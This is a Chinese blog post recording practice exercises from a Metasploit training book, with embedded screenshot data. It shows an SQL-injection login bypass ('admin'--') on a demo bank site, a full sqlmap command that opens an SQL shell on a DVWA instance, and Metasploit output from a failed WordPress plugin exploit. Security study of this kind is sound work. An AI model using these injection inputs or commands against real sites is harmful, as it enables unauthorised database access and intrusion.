zZuB11GkNVHgYy12zd3YA6Awt/XE4Y6ZzqVy0aJGR8aleHJDX+AkTdu3e3dDQ0NraWl1d/fLLL3fr3t1dLPXkVWcHw0zLyqqultZDvB/Vba4YFYhoV5Sg2RTJKSkffbTfbr/c0tJSdq4MzRR9QBDgF/z8f/+31Wpta2uzWq3PPvNccHAI7wYQ4Cve1KnOEYUMrnUmhdeAgOPdXEzkQ9LuWB1YTfirOf6XIjiBF2iCE3gNLT2SPZSb8KIoQkecFVk71S+Ydp1jBY4V8AedwtAkh17NFSXUjILXzl2RDLaPu6T0C3AzyZ3qVTEHkAaMw7RzCp2VS0hMvc9xPENx0n4Ty/cfMMBisdCEU7QDX7/vv/8BSjWK4JDizqkeZHiW4fEHzbl6Z/Bjjz3W2tr6u9///paXxCMb6QJF76OILMvDMeBdX+tkjQ9Cze0nfL3WLBt6UA9FzWGvmY6m4x02ALxmg8uOTkd47DspGC/Qun2H2IuBhy9imhnhy6C7wHjK7iaF14CAZfgbAwjcaAigDGMZnqF42hggwMMjQKAvsaR8ecGpmSCd/eqxMIIAeE5QmD7oRMErq1k8DUDgToPiJin9AtxM6tTMNOgIZy++CO7/+OPxEyaEBIfF9e63d9++NWvWILwsAPDoo/9xUjY4gCkwtLRByMuvjC6ghHdbgDuAv/nmG/UtMb9ONt4FHC9AYxpnRF6ASB3qA6hO9rU+IOAFeYcLqank5Vi9FmuUDXvAh6J+vop0dBzvmAHgNXcWEKg7wkjf8YLLGNDvOy8GHv7Sr85IsQy6C+ySstak4N2PXk10gsLASt0QQMAxgjsbAvgAW1PhCEkNCFD4TgMCggMA8JyAmw6wNA81B/qFYSie17LpU0dR2BCo5bS6wO7ax11S+gW4mXQjAAEvSLMUTgCa5KZOnfbtt9+2trZWVFjWrFnj5+/PMNKOmiiKtTW19957v8tc4gVaRvEs62I6wNA8nGN3KiC4jdhIF0C7Ko7XWDGhUhTfHjLe154BgbwiO4vB8FB+MBTnsWy81lB0l69mOpqOJnvsPnUYzY4w1nfaNgRq9m7goUUMZqTWK+DLoLvAipTVk4J3M3p5FTpRhIGVuiGAALg/ZQAfeE7AhRxiRTCP4TVfxxFqg4IfN9cHAAi8ZKznLnEpmAAYUsOmTx0FaJ0y0CySZhS8fdwl5bEAN426Aggolf7NGZIXGEoC2pr2wBx2ykBhCYymKHzGkTWPgWt17ibfZDbS8jrW4FApCju3s32t0/v4ioEr8FExUBYeLdVRMM188QDqdDQdTVa0rZEwmh3hse8orbXF3bDp1MBzBvO0iOHLoLvAivqqJwXvZvQqC6MKAx9uFCAw6Y4kU5qa7DWbg8dk79gcOTeNrz8gUAArk28o3wCh76Fz9cfTLW8Qg3zLJ96/Id8xg8ccoubIuVO5q58/Nunfisx1ymSv2Rw8JnvH5si5aewEBKLh63IN0nVP8LrnDg99wuvZCwoKwsPDFV6iKLa1tVkslnXr1gUHByOv48ePo5AnTpzA88rOzj516tTly5cvX768d+/e5OTkLtZCJy8UpitZdIq8m5kZU6ZYrVbFVQRe8/z580VRnD9//i2fPCZ3is1l3WTv2Bw5N43/3QEBACA0NPR3v/vdK6+88s9//hN+uQCPHhgYOHjw4B07dmzcuBF51dfX9+/fHwAwYMCA+vp6FHj9+vUlJSWJiYmhoaHx8fFvv/12FxtBJ69O1fR6kXcz81//+ldySor6czje4YM333yzrLxc/QFWk3/lbC7rJnvH5si5aWwCAidt3rx55cqVml7dunW7ePEi8tq6devq1asBAGvWrNm2bRsKbLPZ7r77bjzif/7nf3pbAw953RLybmb+/PPPAgBqd+8AQXV19Zy5c41fzWbyr4TNZd1k79gcOTeNXQBBXl4euoQ4Ly8PlwRZWVklJSXt7e02m2379u34F/NmzpwJvwxdW1u7aNEi5I6Lrry8vKKiot69exuROllZWaWlpW1tbXV1dfBDzCjBCRMmFBUVtbS02Gy2nTt34p/wyc3NtVgs7e3t1dXVeXl5XgCCxMTEL7/8UtOrT58+zc3NyGvixIlff/01AOCbb76ZPHkyCmy32/HvDrvL1LhQ18kLYPsa6ojuOgVF7Nmz544dO+x2u81mW758OXTPz8+Hl0ZbrVbkCADo2bPn5s2brVarw+Foamr65NNP0Q2avCCsWLECxVq2bBk+vNzdhOrO3SP37devvr4e+PrabLY+ffviXtNnzEBVVlzVouOVOW0aGmxLlixB7t179Hjttdc0q6zjZbIOm8u6yd6xOXJuGvuM838WmheKolhRYUkcMTrAL+T+exMryivSUqYg48NDn30+fuwkPxAUGR7z4gsv73jvH9A9Iy2ztrZu0oSUQP/Q3wwYvG3rGyiKKH0NiP9/zzy3/a3/BXyAESvH5ElpjY32WTMeCg4M+/0991VUWCaOT0YJfvXPr0YnjQvwC+nRrffft7/97jvvQa/01KkV5RX335sY4BeSOGK0xVIJc9dnRZjgwLDGRrvCS+D8fzsw/sP/24vyEkWRoYQLF75PT536448XWRqgwBsLN504fiI1OcPfV/l9PzxTI2XzmJe7Wuh3Coqyb+9HDz0wJywk8q7oHq9sfJUiuDmz51WUV4y4LynAL2Tk/aMslsoHZz0Mwx89cjR/+cq7ontwjG9UxF1ZmTMPffY59NKJpVNCfXcdnjdnwfs7d1EEt+v93XMfnm+kyjpeOoNNp8o6XiabbLLJty/7bHxnB4QGoiimpqUhpJCSmlpcXKwJIsIjIpqamuCzzmcxRVEMCQ3d88EHa9asMY5QiouLly5div5OmTr1wMGDKMERI0cirx49e6KvUBcXF+NfzExLTzfy0qkI4+vn9/PPPyMvnKqrq3v07InHevnll3/88cdXX30VT8fXz2/p0qXwZfTs2bPLli1Tb5x3inXyclcL/U5BUXJzcxWOiq+OpqWno2+sNTU1oa/AKZQNis86Z2RknDx5Uq2QcKf/0FeQqOmtt95aunQpAODxxx//29/+htx1Puus41VcXPz444+jv5mZmQcPHoTPTU1NQ4cO1Yyl42WSSSaZdPuSCyCIiIxE8iAiMrKxsRE+R0VHFxYWVldXt7a2QgH5yy+/QC+HwxEVHe1O6nz55ZeVlZWrV692F0CtMXY4HLFxcehvVHT0hQsXUHj/gABNWWi32/HCR0ZFeQEIwiMiLl++rPAKCAxMGDLko/37kRUb9EpMShJFcfyECZoi2c/ff9z48cXFxS+99FLXAYF+XmoXnU5BUXr17q1wVLeh3W6Hz2vXrm1raysqKnrpxcJly5YlJSWhAWS326OiotDf6Ohou92uGGTXERDU1NQMHz4cADB8+HCr1YrcHQ4Hvo2Fk74XvsUTExNz4cIF+Lxu3TpY5Y0bNyqqrONlkkkmmXT7kh4g+Omnn+Dz3n373nrrrfiEhKDgYF4QwsLDkRDSBwTjJ0yIjYv77rvvdD7fqRZmirfza9euuZN8yKWhoaHrgGBkYuKJEyc0vWLj4hoaGjwWQ8GxcXFIh9EVQNBZFyOAQO2oAwh4Qeg/YMCCBQvWPrV+3759DofjxRdfhAPoZgKC/v37K8YGMuH0GhCoBxvyHThw4MKFCwsKChRV1vcyySSTTLpNyQUQpKU7v96dnJJy9OhR+Nzc3BwZFYW8pmVlIYmiv2UAH/5w772XLl0y+IHOoqKi7j16dFY6FhUVdX3LYPPmzatWrdL0uqtbN6Qv0SnG+vXrcffYuLiLFy8aqbVxyX29tgzUjootg9S0NLRlgBhuGSQkJFy5cgUOIMWWQXp6uvEtg46OjoCAAOODNScnZ9euXejvrl27srOz4bN3WwZFRUW4XaoO4VU27mWSSSaZdBuRCyCwWCyjRo8ODQ0bMXJkWXk5sp0+evRoQUFBZFRUZFTUrAceqK6uRhIlc9q0urq6lNTUsPDwQYMHb968WVPqTJ8xo66urmevXh5F4OTk5EOffz5i5MiQ0NDIqKjpM2Z8cfiwR1mYMWVKWXn5iJEjQ0PDRo0ebbFYjAOCoODgYcOHFxYWlpaWBgeHKFL2DwgY+JvfvPvee2+//bbHYoiiuPP994cNHx4YFDR02LBPP/ussLBQHdhI2boCCHQ6RQcQLFiwoLyiYmRiYmhoWGJSUoXFMnfuXOhVUlKSk5PTt18/jvGNjY199tlnS0pK4ABauHBhRUVFUlJSeHj4qFGjLBbLvHnzFIPMHSCorKycM2eOv7+/wcH697///dFHH0V//+M//mP79u3wOSsrq66uLi0tLSIiIj4+fsuWLSiYjldKSsrnn3+emJgYFhYWHR09c+bMw4cPQ6+SkpLc3Ny77747ICBAUWUdL5NMMsmk25dcAEF2djY6dpiTk4NERZ++fXfv2dPY2OhwOIqLi8eMHYtLlBkzZ5aWlra3t58/f37RokXupM7KlStPnTqFJK4OT5w06fCRI83NzS0tLZ8dOoT0FvqyEB47vHr1anV1dXZ2tkFAIIqiw+E4d+7chg0bwsLDFV6iKLa3t1ut1hdffBH56hQjOSXlo/37L1++3NLSUlZe/uSTTwYEBt4gQCBqkcdO0QEEAgArV66sra3t6OioqalZsWIF8ho/YcKu3bsbGhpaW1urq6sLCwt79OgBB5Cvr++qVatQrPz8fPUgcwcIpk+fbrVar127ZnDvoLa2NiEhAf0dMmRITU0N+jtr1ixU5cWLF+MRdbwmT558RB5shw4dysjIgO4TJ07c7abKOl4mmWSSSbcvOQGBySZ7ZPUpA5NMMskkk+4MMgGByZ1gExCYZJJJJt2pZAICkzvBJiAwySSTTLpTyQQEJneCTUBgkkkmmXSnkgkITO4Em4DAJJNMMulOJRMQmNwJNgGBSSaZZNKdSiYgMLkTbAICk0wyyaQ7lUxAYHIn2AQEJplkkkl3Kv1/YpSBF+JNhJMAAAAASUVORK5CYII=" alt="" />

在http://www.testfire.net/bank/login.aspx中通过构造   admin'--   的输入,轻松登入。

但是要怎么进一步的获得数据库中的信息呢?我还没搞定。

2、照书本p163做即可

3、wXf下载地址:  https://github.com/forced-request/wXf

下载后解压,切换至解压目录下,运行./console,提示

/usr/lib/ruby/2.2./rubygems/core_ext/kernel_require.rb::in `require': cannot load such file -- iconv (LoadError)

由于对ruby不太熟悉,网上的方法也看不太懂,暂且跳过。

4、我选择这个漏洞进行测试     https://www.exploit-db.com/exploits/37182/

然而得到的测试结果为:

[CRITICAL] all tested parameters appear to be not injectable.

不知道是不是后台服务器软件的版本问题。

5、不知道怎么弄。。先跳过

6、通过如下命令成功植入sql shell!

sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'  --cookie='security=low; PHPSESSID=7918oeoatnur63rq8bokn88sd2' --sql-shell

aaarticlea/png;base64,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" alt="" />

7、p177

按照提示一步一步来,但是没有成功:

[*] Started reverse TCP handler on 10.10.10.128:

[*] Successfully uploaded shell.

[*] Trying to access shell at <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html><head>

<title> Request Entity Too Large</title>

</head><body>

<h1>Request Entity Too Large</h1>

The requested resource<br />/wordpress//wp-content/plugins/1-flash-gallery/upload.php<br />

does not allow request data with POST requests, or the amount of data provided in

the request exceeds the capacity limit.

</body></html>

...

[*] Exploit completed, but no session was created.

《Metasploit魔鬼训练营》第四章(下)的更多相关文章

  1. 《Metasploit魔鬼训练营》第一章实践作业

    <Metasploit魔鬼训练营>第一章实践作业 1.搜集Samba服务usermap_script安全漏洞的相关信息,画出该安全漏洞的生命周期图,标注各个重要事件点的日期,并提供详细描述 ...

  2. win32多线程程序设计笔记(第四章下)

    上一笔记讲了同步机制中的临界区域(Critical Sections).互斥器(Mutexes),下面介绍同步机制中的另外两种. 信号量(Semaphores) 举个例子: 现在有人要租车,接待他的代 ...

  3. 《Metasploit魔鬼训练营》第一章习题

    书本p391.The time line is as follows: * May 7, 2007: Initial defect disclosure to the security@samba.o ...

  4. Android艺术开发探索第四章——View的工作原理(下)

    Android艺术开发探索第四章--View的工作原理(下) 我们上篇BB了这么多,这篇就多多少少要来点实战了,上篇主席叫我多点自己的理解,那我就多点真诚,少点套路了,老司机,开车吧! 我们这一篇就扯 ...

  5. ROS机器人程序设计(原书第2版)补充资料 (肆) 第四章 在ROS下使用传感器和执行器

    ROS机器人程序设计(原书第2版)补充资料 (肆) 第四章 在ROS使用传感器和执行器 书中,大部分出现hydro的地方,直接替换为indigo或jade或kinetic,即可在对应版本中使用. 第四 ...

  6. 《Django By Example》第四章 中文 翻译 (个人学习,渣翻)

    书籍出处:https://www.packtpub.com/web-development/django-example 原作者:Antonio Melé (译者注:祝大家新年快乐,这次带来<D ...

  7. 《Linux内核设计与实现》读书笔记 第四章 进程调度

    第四章进程调度 进程调度程序可看做在可运行太进程之间分配有限的处理器时间资源的内核子系统.调度程序是多任务操作系统的基础.通过调度程序的合理调度,系统资源才能最大限度地发挥作用,多进程才会有并发执行的 ...

  8. 《Entity Framework 6 Recipes》中文翻译系列 (21) -----第四章 ASP.NET MVC中使用实体框架之在页面中创建查询和使用ASP.NET URL路由过虑

    翻译的初衷以及为什么选择<Entity Framework 6 Recipes>来学习,请看本系列开篇 4.2. 构建一个搜索查询 搜索数据是几乎所有应用的一个基本功能.它一般是动态的,因 ...

  9. 精通Web Analytics 2.0 (6) 第四章:点击流分析的奇妙世界:实际的解决方案

    精通Web Analytics 2.0 : 用户中心科学与在线统计艺术 第四章:点击流分析的奇妙世界:实际的解决方案 到开始实际工作的时候了.哦耶! 在本章中,您将了解到一些最重要的网络分析报告,我将 ...

  10. 《利用python进行数据分析》读书笔记--第四章 numpy基础:数组和矢量计算

    http://www.cnblogs.com/batteryhp/p/5000104.html 第四章 Numpy基础:数组和矢量计算 第一部分:numpy的ndarray:一种多维数组对象 实话说, ...

随机推荐

  1. 理解HTTPS

    总结HTTPS HTTPS要使客户端与服务器端的通信过程得到安全保证,必须使用的对称加密算法,但是协商对称加密算法的过程,需要使用非对称加密算法来保证安全,然而直接使用非对称加密的过程本身也不安全, ...

  2. JavaScript对象之关联数组

    Tip: 内容摘抄自<JavaScript权威指南>,看过该书的同学可以忽略本文. 存取一个对象的属性的方式: obj.attr; obj["attr"]; 两者最重要 ...

  3. 总结HTML5

    都说项目页面是HTML5写的,但是HTML5的特别之处用了多少? 1.是不是页面布局都是统一的div,然后class写样式?可是HTML5提供了好多新标签 ,css中直接用标签名即可定义样式,不用费力 ...

  4. 正则和grep——再做正则就去死

    grep 文本过滤工具 基本正则表达式 grep 语法 基本正则表达式的元字符 次数匹配 位置锚定 分组 扩展正则表达式 基本正则表达式的元字符 次数匹配 位置锚定 分组 或者 grep的介绍 lin ...

  5. 【转】java事件监听机制

    java中的事件机制的参与者有3种角色: 1.event object:事件状态对象,用于listener的相应的方法之中作为参数,一般存在与listerner的方法之中 2.event source ...

  6. C++ 中memset 勿要对类使用

    C++ 中memset 勿要对类使用 参考链接: http://www.cppblog.com/qinqing1984/archive/2009/08/07/92479.html 百度百科第一次这么给 ...

  7. TCP协议的滑动窗口协议以及流量控制

    参考资料 http://blog.chinaunix.net/uid-26275986-id-4109679.html http://network.51cto.com/art/201501/4640 ...

  8. A - Wrestling Match HDU - 5971

    Nowadays, at least one wrestling match is held every year in our country. There are a lot of people ...

  9. C# group 子句

    group 子句返回一个 IGrouping<TKey,TElement> 对象序列,这些对象包含零个或更多与该组的键值匹配的项. 例如,可以按照每个字符串中的第一个字母对字符串序列进行分 ...

  10. onload、DOMContentLoaded与性能问题

    onload.DOMContentLoaded与性能问题 onload事件 DomContentLoaded   1.onload事件 onload事件一般在所有的文档内容加载完成后触发,如果网页中图 ...